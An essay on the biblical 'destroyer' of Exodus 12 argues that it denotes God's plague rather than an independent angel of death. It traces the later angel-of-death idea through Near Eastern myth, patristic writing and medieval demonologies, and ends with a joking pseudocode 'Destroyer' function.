The Angel of Death as an Outsourced Service

Angel of Death in Egypt

The Hagaddah which is recited at the Seder on the first night of Passover retells the biblical story of the infliction of the ten plagues on Egypt and the exodus of the Israelites slaves. One four verse passage referencing chapter 12 in the book of Exodus stands out in the narrative because of the redundant emphasis on who was responsible for these acts:

  1. “I will pass through the land of Egypt”, I and not an angel;
  2. ”And I will smite every first-born in the land of Egypt”, I and not a seraph;
  3. ”And I will carry out judgment against all the gods of Egypt”, I and not a messenger;
  4. ”I G-d”, and none other!

;וְעָבַרְתִּי בְאֶרֶץ מִצְרַיִם בַּלַּיְלָה הַזֶּה – אֲנִי וְלֹא מַלְאָךְ
;וְהִכֵּיתִי כָל בְּכוֹר בְּאֶרֶץ־מִצְרַים. אֲנִי וְלֹא שָׂרָף
;בְכָל־אֱלֹהֵי מִצְרַיִם אֶעֱשֶׂה שְׁפָטִים. אֲנִי וְלֹא הַשָּׁלִיח
.ואֲנִי ה’. אֲנִי הוּא וְלֹא אַחֵר

The 1320 Golden Hagadah P36-37
Image 1: The passage in the Golden Hagaddah circa 1320 CE

The context of the verses makes it clear that G-d alone inflicted the punitive measures and that they were executed directly by Him and not through other intermediaries like an angel, seraph, or messenger. Further support for this can be found in verse 12:12:

“For I will go through the land of Egypt on that night and will smite all the first-born in the land of Egypt, both man and beast; and against all the gods of Egypt I will execute judgment: I am G-d.

וְעָבַרְתִּי בְאֶרֶץ-מִצְרַיִם, בַּלַּיְלָה הַזֶּה, וְהִכֵּיתִי כָל-בְּכוֹר בְּאֶרֶץ מִצְרַיִם, מֵאָדָם וְעַד-בְּהֵמָה; וּבְכָל-אֱלֹהֵי מִצְרַיִם אֶעֱשֶׂה שְׁפָטִים, אֲנִי יְהוָה

But despite this clear and repetitive language regarding G-d’s direct responsibility, some Jewish and Christian scholars argue that the term “destroyer” used in verse 12:23 does not refer to G-d and should instead be read as the “angel of death”. They also postulate that G-d doesn’t act directly or get involved in the ‘hands-on’ day to day minutiae. Thus, he must have been using an agent of some sort to perform this work.

This textual dichotomy has been the source of endless arguments between theologians, translators and scholars. For example, the Pseudo-Jonathan Targum (translation) of Exodus 12 uses both the terms מַלְאָכָא מְחַבְּלָא (Aramaic for “destroying angel”) and מַלְאָךְ מוֹתָא, (Aramaic for the “angel of death”). Obviously, this interpretation suggests that besides G-d there is another entity—angelic or otherwise—with a certain degree of autonomy at work here.

From the contextual point of view, the arguments in favor of an angelic agent raise a number of questions about the role of this “destroyer” and the scope of his responsibility and autonomy. For example, can this destroyer exercise free judgment? Is he constrained by any boundaries?

The Hebrew bible emphasizes the idea that the entire universe falls under G-d’s jurisdiction and that all of nature falls under his control. He is the creator of light and darkness, good and evil. As Genesis 1:31 and Isaiah 45:7 state, He is the creator of all things:

“And G-d saw every thing that He had made, and, behold, it was very good. And there was evening and there was morning, the sixth day.”

וַיַּרְא אֱלֹהִים אֶת-כָּל-אֲשֶׁר עָשָׂה, וְהִנֵּה-טוֹב מְאֹד; וַיְהִי-עֶרֶב וַיְהִי-בֹקֶר, יוֹם הַשִּׁשִּׁי

I form the light, and create darkness; I make peace, and create evil; I am G-d, that doeth all these things.

יוֹצֵר אוֹר וּבוֹרֵא חֹשֶׁךְ, עֹשֶׂה שָׁלוֹם וּבוֹרֵא רָע; אֲנִי יְהוָה, עֹשֶׂה כָל-אֵלֶּה

The scripture also makes it clear that G-d is not dependent on his creation and the creation cannot exist independently of Him. Even Satan’s depiction in Job 1.7 illustrates that he is not a rival of G-d nor does he possess the ability to oppose him in any way, he is just one of many tools that G-d uses to maintain the world in working moral order. Job 1.21 further reinforces the idea that the life and death cycle entirely emanates from G-d:

“And he said; naked came I out of my mother’s womb, and naked shall I return thither; G-d gave, and G-d hath taken away; blessed be the name of G-d.”

וַיֹּאמֶר עָרֹם יָצָתִי מִבֶּטֶן אִמִּי, וְעָרֹם אָשׁוּב שָׁמָּהיְהוָה נָתַן, וַיהוָה לָקָח; יְהִי שֵׁם יְהוָה, מְבֹרָךְ

So if the scripture consistently states that G-d has complete and undisputed sovereignty, what then is the basis for the existence of an independent angelic agent who manages death, destruction, and the afterlife?

Broadly speaking, the basis for this argument can be classified into these three categories of references:

  1. Specific scriptural terminology such as: Abaddon, destroyer, messengers of death, angel that destroys, executioner, slayer, angel of G-d, Ashmedai, Satan, the harvester of souls, the angel that smites, serpent, adversary, captain of the host of G-d, leviathan the slant serpent, leviathan the tortuous serpent, and dragon
  2. Allegorical Sources such as: Personification of death in the scripture, messengers of death, Day-Star, cherub that walks on stones of fire, and anointed cherub
  3. Legend Sources such as: Testament of Solomon, The Zohar, The Talmud, the book of Tobit, and Thanksgiving Hymns

Specifically, these implied angelic associations can be found in some of the following passages:

Genesis 3:2-5
Now the serpent was more subtle than any beast of the field which G-d had made. And he said unto the woman: ‘Yea, hath G-d said: Ye shall not eat of any tree of the garden?’

וְהַנָּחָשׁ, הָיָה עָרוּם, מִכֹּל חַיַּת הַשָּׂדֶה, אֲשֶׁר עָשָׂה יְהוָה אֱלֹהִים; וַיֹּאמֶר, אֶל-הָאִשָּׁה, אַף כִּי-אָמַר אֱלֹהִים, לֹא תֹאכְלוּ מִכֹּל עֵץ הַגָּן

Exodus 12:23
“For G-d will pass through to smite the Egyptians; and when He seeth the blood upon the lintel, and on the two side-posts, G-d will pass over the door and will not suffer the destroyer to come in unto your houses to smite you.” 

וְעָבַר יְהוָה, לִנְגֹּף אֶת-מִצְרַיִם, וְרָאָה אֶת-הַדָּם עַל-הַמַּשְׁקוֹף, וְעַל שְׁתֵּי הַמְּזוּזֹת; וּפָסַח יְהוָה, עַל-הַפֶּתַח, וְלֹא יִתֵּן הַמַּשְׁחִית, לָבֹא אֶל-בָּתֵּיכֶם לִנְגֹּף

Joshua 3:13-14
And he said: ‘Nay, but I am captain of the host of G-d; I am now come.’ And Joshua fell on his face to the earth, and bowed down, and said unto him: ‘What saith my lord unto his servant?’

וַיֹּאמֶר לֹא, כִּי אֲנִי שַׂר-צְבָא-יְהוָה–עַתָּה בָאתִי; וַיִּפֹּל יְהוֹשֻׁעַ אֶל-פָּנָיו אַרְצָה, וַיִּשְׁתָּחוּ, וַיֹּאמֶר לוֹ, מָה אֲדֹנִי מְדַבֵּר אֶל-עַבְדּוֹ

Zechariah 3:1-2
And he showed me Joshua the high priest standing before the angel of G-d, and Satan standing at his right hand to accuse him.

וַיַּרְאֵנִי, אֶת-יְהוֹשֻׁעַ הַכֹּהֵן הַגָּדוֹל, עֹמֵד, לִפְנֵי מַלְאַךְ יְהוָה; וְהַשָּׂטָן עֹמֵד עַל-יְמִינוֹ, לְשִׂטְנוֹ

Ezekiel 28:13-19
thou wast in Eden the garden of G-d; every precious stone was thy covering, the carnelian, the topaz, and the emerald, the beryl, the onyx, and the jasper, the sapphire, the carbuncle, and the smaragd, and gold; the workmanship of thy settings and of thy sockets was in thee, in the day that thou wast created they were prepared.

בְּעֵדֶן גַּן-אֱלֹהִים הָיִיתָ, כָּל-אֶבֶן יְקָרָה מְסֻכָתֶךָ אֹדֶם פִּטְדָה וְיָהֲלֹם תַּרְשִׁישׁ שֹׁהַם וְיָשְׁפֵה, סַפִּיר נֹפֶךְ, וּבָרְקַת וְזָהָב; מְלֶאכֶת תֻּפֶּיךָ וּנְקָבֶיךָ בָּךְ, בְּיוֹם הִבָּרַאֲךָ כּוֹנָנוּ

Job 1:6-12
Now it fell upon a day, that the sons of G-d came to present themselves before G-d, and Satan came also among them.

וַיְהִי הַיּוֹם–וַיָּבֹאוּ בְּנֵי הָאֱלֹהִים, לְהִתְיַצֵּב עַל-יְהוָה; וַיָּבוֹא גַם-הַשָּׂטָן, בְּתוֹכָם

Job 16:14
The wrath of a king is as messengers of death; but a wise man will pacify it.

חֲמַת-מֶלֶךְ מַלְאֲכֵי-מָוֶת; וְאִישׁ חָכָם יְכַפְּרֶנָּה

Job 33:22
Yea, his soul draweth near unto the pit, and his life to the destroyers.

וַתִּקְרַב לַשַּׁחַת נַפְשׁוֹ; וְחַיָּתוֹ, לַמְמִתִים

Isaiah 14:12
How art thou fallen from heaven, O day-star, son of the morning! How art thou cut down to the ground, that didst cast lots over the nations!

אֵיךְ נָפַלְתָּ מִשָּׁמַיִם, הֵילֵל בֶּן-שָׁחַר; נִגְדַּעְתָּ לָאָרֶץ, חוֹלֵשׁ עַל-גּוֹיִם

Isaiah 27:1
In that day the LORD with His sore and great and strong sword will punish leviathan the slant serpent, and leviathan the tortuous serpent; and He will slay the dragon that is in the sea.

בַּיּוֹם הַהוּא יִפְקֹד יְהוָה בְּחַרְבּוֹ הַקָּשָׁה וְהַגְּדוֹלָה וְהַחֲזָקָה, עַל לִוְיָתָן נָחָשׁ בָּרִחַ, וְעַל לִוְיָתָן, נָחָשׁ עֲקַלָּתוֹן; וְהָרַג אֶת-הַתַּנִּין, אֲשֶׁר בַּיָּם

Isaiah 37:36
And the angel of G-d went forth, and smote in the camp of the Assyrians a hundred and fourscore and five thousand; and when men arose early in the morning, behold, they were all dead corpses.

.וַיֵּצֵא מַלְאַךְ יְהוָה, וַיַּכֶּה בְּמַחֲנֵה אַשּׁוּר, מֵאָה וּשְׁמֹנִים וַחֲמִשָּׁה, אָלֶף; וַיַּשְׁכִּימוּ בַבֹּקֶר, וְהִנֵּה כֻלָּם פְּגָרִים מֵתִים

Proverbs 16:14
The wrath of a king is as messengers of death; but a wise man will pacify it.

חֲמַת-מֶלֶךְ מַלְאֲכֵי-מָוֶת; וְאִישׁ חָכָם יְכַפְּרֶנָּה

Psalm 109:6
Set Thou a wicked man over him; and let an adversary stand at his right hand.

הַפְקֵד עָלָיו רָשָׁע; וְשָׂטָן, יַעֲמֹד עַל-יְמִינוֹ

2 Samuel 24:16
”And when the angel stretched out his hand toward Jerusalem to destroy it, G-d repented Him of the evil, and said to the angel that destroyed the people: ‘It is enough; now stay thy hand.’ And the angel of G-d was by the threshing-floor of Araunah the Jebusite.”

וַיִּשְׁלַח יָדוֹ הַמַּלְאָךְ יְרוּשָׁלִַם, לְשַׁחֲתָהּ, וַיִּנָּחֶם יְהוָה אֶל-הָרָעָה, וַיֹּאמֶר לַמַּלְאָךְ הַמַּשְׁחִית בָּעָם רַב עַתָּה הֶרֶף יָדֶךָ; וּמַלְאַךְ יְהוָה הָיָה, עִם-גֹּרֶן האורנה (הָאֲרַוְנָה) הַיְבֻסִי

Chronicles 21:14-16
So G-D sent a pestilence upon Israel; and there fell of Israel seventy thousand men.

וַיִּתֵּן יְהוָה דֶּבֶר, בְּיִשְׂרָאֵל; וַיִּפֹּל, מִיִּשְׂרָאֵל, שִׁבְעִים אֶלֶף, אִישׁ

And G-d sent an angel unto Jerusalem to destroy it; and as he was about to destroy, G-d beheld, and He repented Him of the evil, and said to the destroying angel: ‘It is enough; now stay thy hand.’ And the angel of G-d was standing by the threshing-floor of Ornan the Jebusite.

וַיִּשְׁלַח הָאֱלֹהִים מַלְאָךְ לִירוּשָׁלִַם, לְהַשְׁחִיתָהּ, וּכְהַשְׁחִית רָאָה יְהוָה וַיִּנָּחֶם עַל-הָרָעָה, וַיֹּאמֶר לַמַּלְאָךְ הַמַּשְׁחִית רַב עַתָּה הֶרֶף יָדֶךָ; וּמַלְאַךְ יְהוָה עֹמֵד, עִם-גֹּרֶן אָרְנָן הַיְבוּסִי

And David lifted up his eyes, and saw the angel of G-d standing between the earth and the heaven, having a drawn sword in his hand stretched out over Jerusalem. Then David and the elders, clothed in sackcloth, fell upon their faces.

וַיִּשָּׂא דָוִיד אֶת-עֵינָיו, וַיַּרְא אֶת-מַלְאַךְ יְהוָה עֹמֵד בֵּין הָאָרֶץ וּבֵין הַשָּׁמַיִם, וְחַרְבּוֹ שְׁלוּפָה בְּיָדוֹ, נְטוּיָה עַל-יְרוּשָׁלִָם; וַיִּפֹּל דָּוִיד וְהַזְּקֵנִים מְכֻסִּים בַּשַּׂקִּים, עַל-פְּנֵיהֶם

II Kings 19:35
And it came to pass that night, that the angel of G-d went forth, and smote in the camp of the Assyrians a hundred fourscore and five thousand; and when men arose early in the morning, behold, they were all dead corpses.

וַיְהִי, בַּלַּיְלָה הַהוּא, וַיֵּצֵא מַלְאַךְ יְהוָה וַיַּךְ בְּמַחֲנֵה אַשּׁוּר, מֵאָה שְׁמוֹנִים וַחֲמִשָּׁה אָלֶף; וַיַּשְׁכִּימוּ בַבֹּקֶר, וְהִנֵּה כֻלָּם פְּגָרִים מֵתִים

Hosha 13:14
Shall I ransom them from the power of the nether-world? Shall I redeem them from death? Ho, thy plagues, O death! Ho, thy destruction, O nether-world! Repentance be hid from Mine eyes!

מִיַּד שְׁאוֹל אֶפְדֵּם, מִמָּוֶת אֶגְאָלֵם; אֱהִי דְבָרֶיךָ מָוֶת, אֱהִי קָטָבְךָ שְׁאוֹל–נֹחַם, יִסָּתֵר מֵעֵינָי

The argument advocating for the concept of an independent destroyer goes back to dawn of Egyptian and Canaanite religions. Egyptian texts that describe Osiris as the god of the dead and the lord of underworld date as early as 2500 BCE. According to passages in the book of the dead, after death, the deceased would face forty-two divine judges that evaluated If he lived in conformance with the guidelines of goddess Ma’at, who represented truth and rightness living. If the they passed the test, they were welcomed into the heavenly kingdom of Osiris. If they failed, they did not share in eternal life and were taken by Ammit, the “devourer” and subjected to terrifying punishments and then thrown to the soul-eating demons in hell.  Sort of Dante’s inferno, Egyptian style.

Ones in hell, the goddess Sekhmet inflicted further punishments on them in the place of “destruction”. The dead were thrown into lakes of fire kindled by flame spitting snakes, where demons fed on the victims entrails and drank their blood. The demons then butchered and hacked their victims to pieces and burned them with inextinguishable fire, in deep pits or in cauldrons, where they were scorched, cooked, and reduced to ashes. 

Egyptian Hell
Image 2: Egyptian view of hell

Not as detailed as the Egyptian book of the dead, the Canaanites developed similar concepts about their god of death and the underworld.

The Canaanite deity Mavet  מָוֶת Mavet (who shares some traits with Osiris), played a central role in the The Baal Cycle written circa 1500 BCE. The hymn describes the god of death and the underworld as a predator with an unsatieted appetite for consuming the living by:

…Mavet (Death) would open His mouth wide.
“A lip to earth,
A lip to heaven,
And a tounge to the stars,
So that Baal may enter His inwards,
Yea, descend into His mouth,
As scorched is the olive,
The produce of the Earth,
And the fruit of the Trees.”

In addition to a detailed description of Mavet’s character and exploits, several other passages in the text detail the rivalry between Baal (the Canaanite equivalent of Zeus) and his brother Mavet (the Canaanite equivalent of Hades). In one example, goddess Anath informs El, the head of the gods about a battle she witnessed between the two deities:

Then Anath went to El, at the source of the rivers, in the middle of the bed of the two oceans.
She bows at the feet of El, she bows and prosternates and pays him respects.
She speaks and says:
“the very mighty Baal is dead.
The prince, lord of the earth, has died” (…)
“They fight like heroes. Mavett wins, Baal wins.
They bit each other like snakes.
Mavett wins, Baal wins.
They jump like horses.
Mavett is scared. Baal sits on his throne”.

In the final part of the Baal cycle, Mavet informs Baal that he, “like a lion in the desert, hungers constantly for human flesh and blood”. Mavet threatens to cause the heavens to wilt and collapse and break Baal into pieces and eat him. Baal is also warned by Shapash, the sun-goddess, about Mavet’s superior power and advises that he submit to him:

Do not draw near the god Mavet,
Lest He make You like a lamb in His mouth,
Like a kid in His jaws Ye be crushed!
The Torch of the gods, Shapash, burns;
The heavens halt on account of El’s darling, Mavet.
By the thousand acres,
Yea the myriad hectares
At the feet of Mavet bow and fall.
Prostrate Yourselves and honor Him!

The goodess Anath Text
Image 3
: Text from the goddess Anath epic referencing Baal’s rivals

The Hebrew Bible rejected these polytheistic concepts of an independent god of death and the rivalry between deities. According to Isaiah 45:7, G-d is the only source of both good and evil and is the master of life and death.

Cassuto in his commentary on the Pentateuch argued that the bible was written in the language of the common man, and thus, the personification of death and the allusions to his other emissaries such as the leviathan the slant serpent, leviathan the tortuous serpent, and the dragon as described in Genesis 1:21 and Isaiah 23:1 were remnants of the ideological war that the Hebrew bible waged against the pervasive culture that was infused with these concepts. In opposition to the dominant beliefs of the time, the scripture emphasized the notion that no other entity but G-d possessed the power to create and return man to dust Job 10:9.

A careful reading of the roles of the “destroyer”, “the harvester of souls”, the “angel of the Lord” who “smites” and “destroys” human beings in the scripture shows that they are always temporary messengers with limited scope of operation and windows of opportunity of action. In the few instances where death is personified as in Psalms 49:15; 91:3; Job 18:14, and Proverbs 16:14; 17:11 it is clear that he does not possesses any permanent power nor has the ability to terminate life of his own volition.

From a historical prospective, the western concept of an independent angel of death only emerged in the post-biblical period and can be attributed to the fusion of Egyptian, Canaanite, and Greek religions in the Hellenistic world.

This amalgam of deities the likes of Hades, Osiris, and Mavet formed the distinct figure of the angel of death who became associated with the terrifying demons and evil spirits commonly found in the ancient near east literature. By this time, this hybrid deity retained only a tangential association with the biblical concepts of the destroyer as a vehicle for delivering morally driven divine retribution. 

This new manifestation of evil, death, cruelty, and wretchedness also incorporated the concept of the morally deficient, cunning, and deceitful snake from the garden of Eden (Genesis 3:1-14) and after several additions and enhancements such as evil spirits, demons, and Liliths, it appeared in the literature and theology of 2nd century BCE-1st century CE as בְּלִיַעַל‎ Belial. One example dated to the second Temple period found in a Dead Sea Scroll titled the “Songs of the Sage”, contains the following apotropaic prayer: 

“And, I the Sage, declare the grandeur of his radiance in order to frighten and terri[fy] all the spirits of the ravaging angels and the bastard spirits, demons, Liliths, owls”

In another Dead Sea scroll, a fragment entitled “Curses of Belial” contains a reference to Belial בְּלִיַעַל (wicked or worthless), “sons of Belial”, the “angel of the Pit” and a “spirit of destruction” and carries the following curses against him and his lot:

“The Community Council shall say together in unison, ‘Amen. Amen.’ Then [they] shall curse Belial and all his guilty lot, and they shall answer and say, ‘Cursed be [Be]lial in his devilish and damned be he in his guilty rule.”

From the 2nd century CE through the early middle ages, Belial became affiliated with the devil in gospel texts and assumed a central and permanent role of the ultimate evil that seeks to seduce, sabotage, harm, and fight mankind. He is described as a rebellious fallen angel who rose against G-d and challenged his sovereignty.

Lacking direct biblical sources to support these assertions, some prominent theologians such as Cyprian, Clement of Alexandria, Augustine, Dionysius the Pseudo-Areopagite, and John of Damascus, Origen used unrelated passages such as Isaiah 14:12-15 to buttress their claims:

“And thou saidst in thy heart: ‘I will ascend into heaven, above the stars of G-d will I exalt my throne, and I will sit upon the mount of meeting, in the uttermost parts of the north;
I will ascend above the heights of the clouds; I will be like the Most High.”

The Satanic Verses V1
Image 4: L-R Cyprian, Clement of Alexandria, Augustine, Dionysius, John of Damascus, Origen 

The absence of supporting scriptural provenance didn’t stop the widespread dissemination of these daemonic ideas. Now instead of using biblical exegesis, writers resorted to speculative fiction to describe in detail the devil’s nature, domain, powers, and attributes. For example, Cyprian in his Treatise 10.4 claimed that the reason for the fall of Satan was:

“When he saw human beings made in the image of God, he broke forth into jealousy and malevolent envy” and thus rebelled against God.

Where the biblical world experienced a rare and indirect interaction with a “destroyer”, the religious universe of late Roman period swarmed with pitched battles between angels and demons, with humanity caught in between. Even the most mundane matters including eating, marriage, and bearing children became a battleground between good the evil. Origen in his Commentary on Matthew and Clement of Alexandria in his Stromata discuss these prevailing contemporary views including one that the institute of marriage “is fornication” and that it was “introduced by the devil”.

By now, the previous narrative of the “destroyer” as mere messenger or the delivery mechanism for divine retribution regressed to the ancient idolatrous relationship between factions of warring deities reflected in the Enuma Elish. The new pantheon of the devil and his cohorts grow steadily and by the 6th century CE authors were dedicating entire treatises to the cataloging of the demonic and angelic realms. Early medieval writers such as Pseudo-Dionysius the Areopagite also produced an encyclopedic works such as the The Celestial Hierarchy that classified angels by function and utility and discussed in great details subjects such as:

“Which is the first Order of the Heavenly Beings? which the middle? and which the last? How many, and of what sort, are the Orders of the super-celestial Beings, and how the Hierarchies are classified amongst themselves”

Pseudo-Dionysius the Areopagite, The Celestial Hierarchy
Image 5: The Celestial Hierarchy of Pseudo-Dionysius the Areopagite

By the Second Council of Nicaea in 787 CE, angles and saints (who are in affect demi-angles) became official objects of veneration and adoration and patrons of every mundane daily function such as food preparation, travel, and athletic activity

St. Sebastian Sterling Silver Medals
Image 6: The St. Sebastian athletic emulates

By the middle ages, Archangel Michael acquired an affiliation with certain functions of the angel of death who—among other responsibilities—was tasked with evaluating and carrying the souls of all the deceased to heaven and fighting Satan. Just like in the case of the Egyptian Anubis, Byzantine and Catholic liturgy and art assigned Michael the role of weighing the souls of the dead with his scales. Another popular depiction of him is being armed with a spear or sword and locked in mortal combat with Satan—In which for some unknown reason, he consistently fails to win a decisive victory.

Archangel Michael
Image 7: Depiction of Archangel Michael in medieval and renaissance art

Anubis Weighing of the Heart
Image 8: Anubis weighing the souls of the dead

From the late middle ages through the late renaissance, we find an increasing a number of books on demonic classification. These works progressively become more elaborate. They detail the nature of each demon, their MO, the category of sins which they impart to their human victims, the month in which their power is strongest, and the saints that are their adversaries. Some of the more notable classification works from this period are:

The 1410 Lantern of Light by John Wycliffe. A daemon classification system that was based on the Seven Deadly sins and the following association of sin and demon:

  1. Lucifer – Pride
  2. Beelzebub (Belzebub) – Gluttony (Glotouns)
  3. Satan (Sathanas) – Wrath (Wraþþe)
  4. Leviathan (Leviathan) – Envy (Envous)
  5. Mammon – Greed (Auarouse)
  6. Belphegor –  Sloth (Slow)
  7. Asmodeus – Lust (Leccherouse)

The 1459 Fortalitium Fidei by Alphonso de Spina. In the chapter on demons, Asphonso took daemon accounting to a new level or precision and stated that the total number of angels who sided with Lucifer’s revolt against G-d was 133,306,668. He also classified demons based on the following criteria:

  1. Incubi and succubi
  2. Familiars
  3. Drudes
  4. Cambions born from the union of a demon with a human being (AKA witches and warlocks).
  5. Demons that induce old women to attend Witches’ Sabbaths

The c. 1486 Malleus Maleficarum (Hammer of Witches). This most ‘thorough’ treatise on witchcraft and demons was written by two German Dominican monks, Heinrich Kramer and Jacob Sprenger and came with an official papal bull. The book sold more copies than any other book except the Bible until 1678. It was single-handedly responsible for the murder of hundreds of thousands (if not millions) of innocent woman and young girls across Europe. According to the book, it has been proven that it is normal for many woman to embrace sorcery and “to perform filthy carnal acts with demons.”

The 1533 De Occulta Philosophia by Cornelius Agrippa. A demon classification system based on the number 4 and the cardinal directions that included:

  1. Oriens – East
  2. Paymon – West)
  3. Egyn – North
  4. Amaymon – Sout

The 1591 The Confessions of Warlocks and Witches by Peter Binsfeld. A demon classification system similar to the Lantern of Light’s seven deadly sins but with a slight variation in the classification as follows:

  1. Lucifer – Pride
  2. Mammon – Greed
  3. Asmodeus – Lust
  4. Leviathan – Envy
  5. Beelzebub – Gluttony
  6. Satan – Wrath
  7. Belphegor – Sloth

The 1597 Daemonologie by King James (the same James who later sponsored the translation of the Bible to English better known as the “King James Bible”). A demon classification treatise in three volumes dedicated to the study of demonology and the methods demons used to inflict and torment mankind. The classification included:

  1. Spectra – Used to describe spirits that trouble houses or solitary places
  2. Oppression – Used to describe spirits that follow upon certain people to outwardly trouble them at various times of the day
  3. Possession – Used to describe spirits that enter inwardly into a person to trouble them
  4. Fairies – Used to describe spirits that prophesy, consort, and transport

The books also covered important topics such as werewolves and vampires. It was aimed at educating the ignored citizenry of England on the history, practices and implications of practicing sorcery and all things demonic.

The Observer's Book of Monsters by Claude Savagely
Image 9: The Observer’s Book of Monsters by Claude Savagely

The 1608 Compendium Maleficarum by Francesco Maria Guazzo (a rework/rip-off of the the 11th century Classification of Demons by Michael Psellus). The work classified demons into:

  1. Empyreal – Fiery
  2. Aerial – Airborne
  3. Subterranean – Underground
  4. Lucifugous – Heliophobic
  5. Aqueous – Water based
  6. Terrene – On the ground

The 1686 Semiphoras and Schemhamforas by Andreas Luppius which was based on a similar system of classification as “De Occulta Philosophia” but instead of 4 used the number 9 and had the following orders of demons:

  1. False spirits
  2. Spirits of lying
  3. Vessels of iniquity
  4. Avengers of wickedness
  5. Jugglers
  6. Airy powers
  7. Furies sowing mischief
  8. Sifters or triers
  9. Tempters or ensnarers

Demonic classification books
Image 10: A sampling of a few demonic classification books from the 14th-17the centuries

Some ancient and modern Jewish scholars, like Richard Friedman, also erroneously made the correlation between the “destroyer” and the angel of death. These errors were based on anecdotal evidence in the secondary literature and art. Friedman for example came to this conclusion based on a sword bearing figure in one of the illustrations on the Golden Haggadah whom he identified as the angel of death (top right corner of Image 11). This led him to conclude that the authors of the 14th century Haggadah must have also subscribed to the textual and theological interpretation that the “destroyer” was in fact the angel of death.

Golden Haggadah Angel of Death
Image 11: Illustration from the Golden Haggadah (Note figure in top right corner)

Ironically, the same Golden Haggadah that is used as proof for the existence of the angel of death contains a hand written note, which is a combination of some biographical details and poetry. In line 6 of the note it reads:

״…בחוכמה בתבונה ובדעת, חי העולמים יושב המרומים ומשגיח התחתונים אחד ונעלם אלקי חיים ומלך עולם…״

“…In wisdom, understanding, and Knowledge, the creator of the universe who sits on high and oversees the underworld (i.e. the dead), who is one and unseen, the king of the world…”

From the context it’s clear that the writer of the text (and likely the owner of the book) did not buy into the angel of death idea or his ability to challenge the sovereignty of G-d.

Intro Text to Golden Haggadah
Image 12: The hand written note in cursive script in the Golden Haggadah and its in-line transliteration to block script

I think that the confusion about the meaning of the “destroyer” in the verses in Exodus can be attributed to the misreading of the text and failure to identify the wordplay and the variant usage of the root N-G-F נגפ. This root and its derivatives can be read as smite, obstacle, defeated, plague, blow, and strike. Depending on its usage and context, it can also be used as a noun such as in ‘bubonic plague’ and as a verb such as in ‘I’ve been plagued by ill health”.  Keeping this in mind, we can try to reconcile the contextual problem by reading verses 12:12-29 as follows:

12–For I will go through the land of Egypt in that night, and will smite [וְהִכֵּיתִי] all the first-born in the land of Egypt, both man and beast; and against all the gods of Egypt I will execute judgments: I am G-d.

13–And the blood shall be to you for a token upon the houses where ye are; and when I see the blood, I will pass over you, and there shall no plague [נֶגֶף] be upon you to destroy [לְמַשְׁחִית] you, when I smite [בְּהַכֹּתִי] the land of Egypt.

22–Take a bunch of hyssop, and dip it in the blood that is in the basin, and strike the lintel and the two side-posts with the blood that is in the basin; and none of you shall go out of the door of his house until the morning.

23–For G-d will pass through to smite [לִנְגֹּף] the Egyptians; and when He seeth the blood upon the lintel, and on the two side-posts, G-d will pass over the door, and will not suffer the destroyer [הַמַּשְׁחִית] to come in unto your houses to smite [לִנְגֹּף] you.

27–that ye shall say: It is the sacrifice of G-d’s Passover, for that He passed over the houses of the children of Israel in Egypt, when He smote [בְּנָגְפּוֹ] the Egyptians, and delivered our houses.’ And the people bowed the head and worshipped.

29–And it came to pass at midnight, that G-d smote [הִכָּה] all the firstborn in the land of Egypt, from the first-born of Pharaoh that sat on his throne unto the first-born of the captive that was in the dungeon; and all the first-born of cattle.

Putting all of these elements together gives us: the destroyer [הַמַשְׁחִית] smites [לִנְגֹּף] using a plague [מגיפה] the first born in Egypt via “the destroyer’s plague” [ נֶגֶף לְמַשְׁחִית], with plague [נֶגֶף].

A similar word play in English would be along the lines of:

The striker (destroyer), stroke (inflicted), the stricken (victims), with a strike (affliction).

So, G-d Himself “passes through” (עָבַר) the land of Egypt and smites all the firstborn in the land of Egypt. This is accomplished via “the destroyer” which happens to be the plague, that plagues the firstborn of Egypt with a plague. In this context, the destroyer is G-d’s mechanism for delivering the destruction. 

To paraphrase Sherlock Holmes: “This Exodus story stands flat-footed upon the ground and there it must remain. The world is big enough for us. No angel of death need apply.”

Considering this, I propose a practical alternative reading of the “destroyer” to be a software function that looks like the following:

Function Destroyer(Identity, DateTime, Agent, Cause, Delay, Reason, Place, Duration, Awareness, Terminate)
  Identity = Identity of the deceased (VictimID)
  DateTime = Date&Time of death (from the creation of the universe)
  Agent = Delivery Mechanism (e.g. Carbon monoxide)
  Cause = Actual cause of death (see CDC codes)
  Delay = In hours:minutes:seconds
  Reason = Triggering event
  Place = Location of victim in universal XYZ coordinates
 
Duration = Timed (use ‘Delay’ as an offset) or Permanent
  Awareness = Premonition value 0-9 about the impending death
  Terminate = A real-time abort flag (True or False)

End Function

Module TenthPlague

    KillFirstBorn()

    DeceptionInvolved = Use cases like Egyptians using fake blood
    or paint on their door, hiding in an Israelite home, etc.

            
       
‘Test if everything is Kosher

        If BloodFoundOnDoor = true DeceptionInvolved = false Then

         
         
Nothing to see here, move along…

          Exit

       
        ‘Are they cheating?
        ElseIf
 DeceptionInvolved = True Then

                         
          ‘Is there a first born inside?
          If FirstBornPresent and Terminate = False Then

         
          Get’em!       
          Destroyer(VictimID,4.54×109,Anthrax,Pneumonia-Cardiac
          Arrest,0,Disobedience10,30°0’47.001656”
          N 31° 12’31.870834” E 12.920,Permanent,0,False)

         
         
End If

       
        ‘There is no blood on the door or we are in the open
        ElseIf BloodFoundOnDoor = False
Then
                

       
  ‘Is there a first born present? 
          If FirstBornPresent and Terminate = False Then
 
         
Get’em!
    
     Destroyer(VictimID,4.54×109,Anthrax,Pneumonia-Cardiac
          Arrest,0,Disobedience10,30°0’47.001656”
          N 31° 12’31.870834” E 12.920,Permanent,0,False)

         
End If

       
       
End If

   
   
End
Sub


End
Module

The destroyer is no more good or bad than any other types of delivery system is good or bad and has no more free will than a carrier delivering a package. Thus, the destroyer is a mere mechanism that G-d uses to execute judgment upon Egypt, Israel, and others. it is not a separate entity. The same dual reference to G-d’s ‘action’ and His ‘delivery mechanism’ can be seen in Samuel 15-16, where G-d sent a plague to punish Israel:
 
“So G-d sent a pestilence  upon Israel from the morning even to the time appointed; and there died of the people from Dan even to Beer-sheba seventy thousand men.”

וַיִּתֵּן יְהוָה דֶּבֶר בְּיִשְׂרָאֵל, מֵהַבֹּקֶר וְעַד-עֵת מוֹעֵד; וַיָּמָת מִן-הָעָם, מִדָּן וְעַד-בְּאֵר שֶׁבַע, שִׁבְעִים אֶלֶף, אִישׁ

and in Samuel 24:16, where the “destroyer” is described as:
 
”And when the angel stretched out his hand toward Jerusalem to destroy it, G-d repented Him of the evil, and said to the angel that destroyed the people: ‘It is enough; now stay thy hand.’ And the angel of G-d was by the threshing-floor of Araunah the Jebusite.”

